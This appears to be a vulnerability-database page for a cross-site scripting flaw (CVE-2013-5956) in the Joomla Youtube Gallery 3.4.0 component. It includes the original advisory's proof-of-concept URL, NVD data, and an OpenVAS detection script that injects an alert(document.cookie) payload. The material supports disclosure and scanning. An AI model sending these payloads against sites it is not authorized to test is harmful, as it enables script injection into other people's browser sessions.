Search...

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

2014-03-15T00:00:00

ID PACKETSTORM:125732
Type packetstorm
Reporter Mahmoud Ghorbanzadeh
Modified 2014-03-15T00:00:00

Description

                                        
                                            `Hello,  
  
Cross-site  
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web  
script or HTML via the videofile parameter to /includes/flvthumbnail.php.  
  
POC:  
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=&lt;script&gt;alert('XSS')&lt;/script&gt;  
`

JSON Vulners Source

Initial Source

{"edition": 1, "title": "Joomla Youtube Gallery 3.4.0 Cross Site Scripting", "bulletinFamily": "exploit", "published": "2014-03-15T00:00:00", "lastseen": "2016-12-05T22:13:08", "history": [], "modified": "2014-03-15T00:00:00", "href": "https://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html", "hash": "ffdd249a89c57ee1c6a4a41a5923bfc212163f0317a0455d2cf5316ac5a9a72e", "viewCount": 4, "sourceHref": "https://packetstormsecurity.com/files/download/125732/joomlayoutubegallery-xss.txt", "reporter": "Mahmoud Ghorbanzadeh", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "2aa0d696430f1d1da241270a3d67ee5e"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "5ef6e6c838d6d1d5fac8dc945cba52f1"}, {"key": "modified", "hash": "509c0fbdd9053cb9e3614791690a89e4"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "509c0fbdd9053cb9e3614791690a89e4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "28cd68c7213433de94188530e1ddda45"}, {"key": "sourceData", "hash": "b2b2c1fba44d5e29568f80a96ef89e11"}, {"key": "sourceHref", "hash": "62eceae358e7482f6487e148e7124b96"}, {"key": "title", "hash": "a46ecef65781ba18ac529d82493e7bee"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 4.3}, "vulnersScore": 4.3}, "sourceData": "`Hello, \n \nCross-site \nscripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web \nscript or HTML via the videofile parameter to /includes/flvthumbnail.php. \n \nPOC: \nhttp://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script> \n`\n", "cvelist": ["CVE-2013-5956"], "id": "PACKETSTORM:125732"}

{"result": {"cve": [{"lastseen": "2016-09-03T19:05:42", "references": ["http://seclists.org/fulldisclosure/2014/Mar/288", "http://seclists.org/fulldisclosure/2014/Mar/264", "http://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in includes/flvthumbnail.php in the Youtube Gallery (com_youtubegallery) component 3.4.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the videofile parameter.", "reporter": "NVD", "published": "2014-04-25T10:15:30", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2013-5956", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2013-5956"], "scanner": [], "modified": "2014-04-25T13:42:55", "cpe": ["cpe:/a:joomlaboat:com_youtubegallery:3.4.0::~~~joomla%21~~"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5956", "id": "CVE-2013-5956", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-06-18T15:14:04", "references": ["http://exploitsdownload.com/exploit/na/joomla-youtube-gallery-340-cross-site-scripting", "http://seclists.org/fulldisclosure/2014/Mar/264", "http://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html"], "pluginID": "1361412562310804336", "description": "This host is installed with Joomla! component youtube gallery and is prone\nto a cross site scripting vulnerability.", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-17T00:00:00", "title": "Joomla Component Youtube Gallery Cross Site Scripting Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5956"], "modified": "2018-06-15T00:00:00", "id": "OPENVAS:1361412562310804336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_youtube_gallery_component_xss_vuln.nasl 10212 2018-06-15 09:51:23Z ckuersteiner $\n#\n# Joomla Component Youtube Gallery Cross Site Scripting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804336\");\n script_version(\"$Revision: 10212 $\");\n script_cve_id(\"CVE-2013-5956\");\n script_bugtraq_id(66245);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-15 11:51:23 +0200 (Fri, 15 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 17:05:07 +0530 (Mon, 17 Mar 2014)\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Joomla Component Youtube Gallery Cross Site Scripting Vulnerability\");\n\n script_tag(name: \"summary\", value: \"This host is installed with Joomla! component youtube gallery and is prone\nto a cross site scripting vulnerability.\");\n\n script_tag(name: \"vuldetect\", value: \"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name: \"insight\", value: \"The flaw is due to insufficient validation of 'videofile' HTTP GET parameter\npassed to '/includes/flvthumbnail.php' script.\");\n\n script_tag(name: \"impact\", value: \"Successful exploitation will allow remote attackers to execute arbitrary HTML\nand script code in a users browser session in the context of an affected site and launch other attacks.\");\n\n script_tag(name: \"affected\", value: \"Joomla Youtube Gallery version 3.4.0 and probably other versions.\");\n\n script_tag(name: \"solution\", value: \"Upgrade to Joomla Youtube Gallery version 3.8.4 or later.\");\n\n script_xref(name: \"URL\", value: \"http://seclists.org/fulldisclosure/2014/Mar/264\");\n script_xref(name: \"URL\", value: \"http://exploitsdownload.com/exploit/na/joomla-youtube-gallery-340-cross-site-scripting\");\n script_xref(name: \"URL\", value: \"http://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif (!http_port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe:CPE, port:http_port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/components/com_youtubegallery/includes/flvthumbnail.php?video\" +\n \"file=<script>alert(document.cookie)</script>\";\n\nif (http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\$document.cookie\$</script>\")) {\n report = report_vuln_url(port: http_port, url: url);\n security_message(port: http_port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}}